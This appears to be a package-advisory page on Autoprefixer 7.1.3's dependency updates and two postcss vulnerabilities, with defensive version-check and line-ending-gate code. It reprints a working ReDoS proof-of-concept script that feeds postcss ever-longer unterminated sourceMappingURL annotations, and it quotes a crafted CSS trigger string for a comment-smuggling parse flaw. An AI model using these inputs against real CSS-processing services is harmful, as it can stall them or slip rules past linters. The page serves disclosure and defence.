Autoprefixer 7.1.3 is a small but worthwhile update over its predecessor, 7.1.2. Both versions do the same job: parse CSS and add the vendor prefixes that current browsers still need, using data from "Can I Use" for cross-browser compatibility. The changes in 7.1.3 are confined to updated dependencies.
Specifically, 7.1.3 bumps "postcss" from "^6.0.6" to "^6.0.10", "browserslist" from "^2.1.5" to "^2.4.0", and "caniuse-lite" from "^1.0.30000697" to "^1.0.30000718". The "caniuse-lite" bump is what keeps the prefixing decisions in step with current browser support data; the other two may pick up bug fixes or performance improvements in the underlying libraries. Note that a caret range only raises the floor: "^6.0.10" still resolves to a 6.x release of postcss, which is why the postcss advisories listed further down this page apply to this version of autoprefixer as well.
In the devDependencies, notable upgrades include "eslint" (from "^4.1.1" to "^4.5.0"), "fs-extra" (from "^3.0.1" to "^4.0.1"), "gulp-babel" (from "^6.1.2" to "^7.0.0"), and "size-limit" (from "^0.5.0" to "^0.10.0"). These affect only the project's own build, lint and bundle-size checks, not consumers of the package. The "gulp-babel" jump to a new major is the one to watch: a major bump can carry breaking changes for existing gulp tasks, so anyone maintaining a fork or a similar build should review its changelog before upgrading.
For users, these updates mean prefixing that reflects current browser data. Keeping up with minor releases like this one is generally worthwhile for such incremental improvements. The release is recent as of the time of writing, which indicates that the "autoprefixer" maintainers are actively maintaining the library and keeping it compatible with current browsers.
All vulnerabilities related to version 7.1.3 of the package
Regular Expression Denial of Service in postcss
The postcss package in versions before 7.0.36, and in versions from 8.0.0 up to but not including 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js (fixed in 7.0.36 and 8.2.13). The vulnerable regexes share the sub-pattern
\/\*\s* sourceMappingURL=(.*)
The proof of concept below feeds postcss.parse() a stylesheet containing an ever-growing run of unterminated sourceMappingURL annotations, one thousand more per step, and prints how long each parse takes:
var postcss = require("postcss");

// Build a stylesheet that repeats the annotation prefix n times and never
// closes the comment, which is the input the advisory uses to trigger the
// vulnerable regexes.
function build_attack(n) {
  var ret = "a{}";
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL=";
  }
  return ret + "!";
}

// A well-formed annotation parses without trouble.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */');

// Grow the attack string in steps of 1000 repetitions and time each parse.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i);
    try {
      postcss.parse(attack_str);
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
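The affected ranges above are what a practitioner needs to check against the postcss version a lockfile actually resolved, not against the caret range autoprefixer declares. The following is an added worked check, not code from the advisory, autoprefixer or postcss: it compares a resolved postcss version numerically (a plain string comparison would rank 8.10.0 below 8.9.9) against the ranges of both postcss issues listed on this page. It assumes plain major.minor.patch version strings without prerelease tags, and the advisory labels are names chosen for this example.

```javascript
// Added example: map a resolved postcss version to the issues listed on this page.
// Assumes plain "major.minor.patch" strings; advisory names are labels for this example.

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v.trim());
  if (!m) throw new Error("unsupported version string: " + v);
  return m.slice(1).map(Number);
}

// Numeric, component-wise comparison: negative, zero or positive like a comparator.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

const lt = (a, b) => compareVersions(a, b) < 0;

// Affected ranges as stated on this page; upper bounds are the fixed releases.
const POSTCSS_ADVISORIES = [
  {
    name: "ReDoS in lib/previous-map.js (sourceMappingURL annotation)",
    affected: v => lt(v, "7.0.36") || (!lt(v, "8.0.0") && lt(v, "8.2.13")),
  },
  {
    name: "\\r line-return parsing discrepancy",
    affected: v => lt(v, "8.4.31"),
  },
];

// Returns the names of the advisories that apply to a resolved postcss version.
function postcssAdvisoriesFor(version) {
  return POSTCSS_ADVISORIES.filter(a => a.affected(version)).map(a => a.name);
}

// Constructed sample versions: the first two are what "^6.0.10" (autoprefixer 7.1.3's
// declared range) can resolve to; the rest sit on the boundaries of the ranges above.
for (const v of ["6.0.10", "6.0.23", "7.0.36", "8.2.12", "8.2.13", "8.4.31"]) {
  const hits = postcssAdvisoriesFor(v);
  console.log(v.padEnd(8), hits.length ? hits.join("; ") : "none of the issues listed here");
}
```

Read the version from the lockfile entry for postcss, not from autoprefixer's package.json: every 6.x release that "^6.0.10" can resolve to falls inside both ranges, so the bump in 7.1.3 does not change the result.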
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters that use PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts that PostCSS parses as a CSS comment. After processing by PostCSS, those parts end up in the output as CSS nodes (rules, properties) despite having originally been inside a comment. The postcss "^6.0.10" that autoprefixer 7.1.3 pulls in is well before 8.4.31; whether that matters for a given pipeline depends on whether it ever parses CSS it does not control.
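Upgrading PostCSS is the fix. Where that is not yet possible, the caller can at least refuse or normalize the input feature this issue turns on, a carriage return that PostCSS and the consumer may treat differently. The following is an added example on the caller's side, not code from PostCSS or from the advisory: it counts lone \r bytes and \r\n pairs in untrusted CSS, rewrites every line ending to \n, and applies a strict-by-default policy that rejects input containing a lone \r. The function names and the strict/lenient policy are choices made for this example; the sample input is the advisory's own trigger string.

```javascript
// Added example: a line-ending gate for CSS from an untrusted source, run before the
// CSS reaches a PostCSS-based linter. Function names and policy are this example's own.

function auditLineEndings(css) {
  const crlf = (css.match(/\r\n/g) || []).length;
  // A lone \r is a carriage return that is not part of a \r\n pair.
  const loneCR = (css.match(/\r(?!\n)/g) || []).length;
  // Rewrite both forms so the parser and every downstream consumer see one convention.
  const normalized = css.replace(/\r\n?/g, "\n");
  return { crlf, loneCR, normalized };
}

// strict: refuse input that still carries a lone \r; lenient: normalize and continue.
function gateUntrustedCss(css, { strict = true } = {}) {
  const report = auditLineEndings(css);
  if (strict && report.loneCR > 0) {
    return {
      accepted: false,
      reason: report.loneCR + " lone \\r byte(s) in untrusted CSS",
      report,
    };
  }
  return { accepted: true, css: report.normalized, report };
}

// Constructed sample built from the trigger string quoted in the advisory above.
const SAMPLE = "@font-face{ font:(\r/*);}\n";

console.log(gateUntrustedCss(SAMPLE));
console.log(JSON.stringify(gateUntrustedCss(SAMPLE, { strict: false }).css));
```

Normalizing on the way in removes the \r discrepancy described above, but it does not make an old PostCSS safe for other inputs; treat it as a stopgap until the parser is upgraded past 8.4.31.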